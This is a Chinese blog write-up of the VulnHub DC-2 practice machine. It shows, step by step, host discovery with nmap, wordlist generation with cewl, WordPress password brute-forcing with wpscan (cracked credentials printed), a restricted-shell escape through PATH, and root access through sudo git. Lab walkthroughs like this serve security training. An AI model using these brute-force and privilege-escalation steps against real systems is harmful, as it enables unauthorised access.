vulnhub靶机DC2渗透笔记
创始人
2025-05-28 14:38:15
0次
信息收集
netdiscover -r 192.168.1.0/24
扫描发现目标机器地址为192.168.1.104
nmap端口扫描
└─$ nmap -A 192.168.1.104 -p- 84 Captured ARP Req/Rep packets, from 3 hosts. Total size: 5040 _____________________________________________________________________________IP At MAC Address Count Len MAC Vendor / Hostname -----------------------------------------------------------------------------192.168.1.1 64:6e:97:dd:97:9b 71 4260 TP-LINK TECHNOLOGIES CO.,LTD. 192.168.1.104 08:00:27:66:2e:b1 1 60 PCS Systemtechnik GmbH 192.168.1.107 e4:5e:37:8e:32:4e 12 720 Intel Corporate ┌──(ydx㉿xuegod53)-[~]
└─$ nmap -A 192.168.1.104 -p- 130 ⨯
Starting Nmap 7.92 ( https://nmap.org ) at 2023-03-15 15:01 CST
Stats: 0:00:08 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 50.00% done; ETC: 15:01 (0:00:06 remaining)
Nmap scan report for 192.168.1.104
Host is up (0.00023s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.10 ((Debian))
|_http-server-header: Apache/2.4.10 (Debian)
|_http-title: Did not follow redirect to http://dc-2/
7744/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u7 (protocol 2.0)
| ssh-hostkey:
| 1024 52:51:7b:6e:70:a4:33:7a:d2:4b:e1:0b:5a:0f:9e:d7 (DSA)
| 2048 59:11:d8:af:38:51:8f:41:a7:44:b3:28:03:80:99:42 (RSA)
| 256 df:18:1d:74:26:ce:c1:4f:6f:2f:c1:26:54:31:51:91 (ECDSA)
|_ 256 d9:38:5f:99:7c:0d:64:7e:1d:46:f6:e9:7c:c6:37:17 (ED25519)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel扫描结果开放80和7744端口,web服务和ssh服务
访问80端口访问不了,需要修改hosts文件
访问网站
flag1
找到flag1 他提示我们使用cewl工具(一个字典生成工具)
**cewl具体使用可以参考:**https://www.codercto.com/a/44828.html
生成爆破密码字典
cewl http://dc-2/ > passwd.txtwpscan扫描WordPress用户
发现三个用户,写入user.txt字典
然后使用wpscan 爆破后台
└─$ wpscan --url http://dc-2/ -U user.txt -P passwd.txt爆破成功
Username: jerry, Password: adipiscing
Username: tom, Password: parturient
dirb扫后台目录
└─$ dirb http://dc-2/ 
后台目录:http://dc-2/wp-admin/
登录后台
flag2
根据提示尝试别的方法,通过扫描端口记得还开放了7744端口ssh服务尝试ssh登录
登录之后发现flag3文件,但是查看不了
flag3
vi查看下提示
需要设置一个环境变量:export PATH=$PATH:/bin/ 和 然后就可以查看etc/passwd;
git提权
根据刚刚的提示他应该让我们切换杰瑞用户,还是没有权限
flag4
根据flag4的提示,git提权
sudo git help config
!/bin/bash
flag5
靶场总结
cewl 根据url返回字典文件
wpsan扫描用户名
wpscan爆破后台
dirb目录扫描
逃脱受限shell
导入PATH环境变量
git提权
思君如满月,夜夜减清辉
上一篇:力扣-排名靠前的旅行者
相关内容
热门资讯
保存时出现了1个错误,导致这篇...
当保存文章时出现错误时,可以通过以下步骤解决问题:查看错误信息:查看错误提示信息可以帮助我们了解具体...
汇川伺服电机位置控制模式参数配...
1. 基本控制参数设置 1)设置位置控制模式 2)绝对值位置线性模...
不能访问光猫的的管理页面
光猫是现代家庭宽带网络的重要组成部分,它可以提供高速稳定的网络连接。但是,有时候我们会遇到不能访问光...
表格中数据未显示
当表格中的数据未显示时,可能是由于以下几个原因导致的:HTML代码问题:检查表格的HTML代码是否正...
本地主机上的图像未显示
问题描述:在本地主机上显示图像时,图像未能正常显示。解决方法:以下是一些可能的解决方法,具体取决于问...
表格列调整大小出现问题
问题描述:表格列调整大小出现问题,无法正常调整列宽。解决方法:检查表格的布局方式是否正确。确保表格使...
不一致的条件格式
要解决不一致的条件格式问题,可以按照以下步骤进行:确定条件格式的规则:首先,需要明确条件格式的规则是...
Android|无法访问或保存...
这个问题可能是由于权限设置不正确导致的。您需要在应用程序清单文件中添加以下代码来请求适当的权限:此外...
【NI Multisim 14...
目录 序言 一、工具栏 🍊1.“标准”工具栏 🍊 2.视图工具...
银河麒麟V10SP1高级服务器...
银河麒麟高级服务器操作系统简介: 银河麒麟高级服务器操作系统V10是针对企业级关键业务...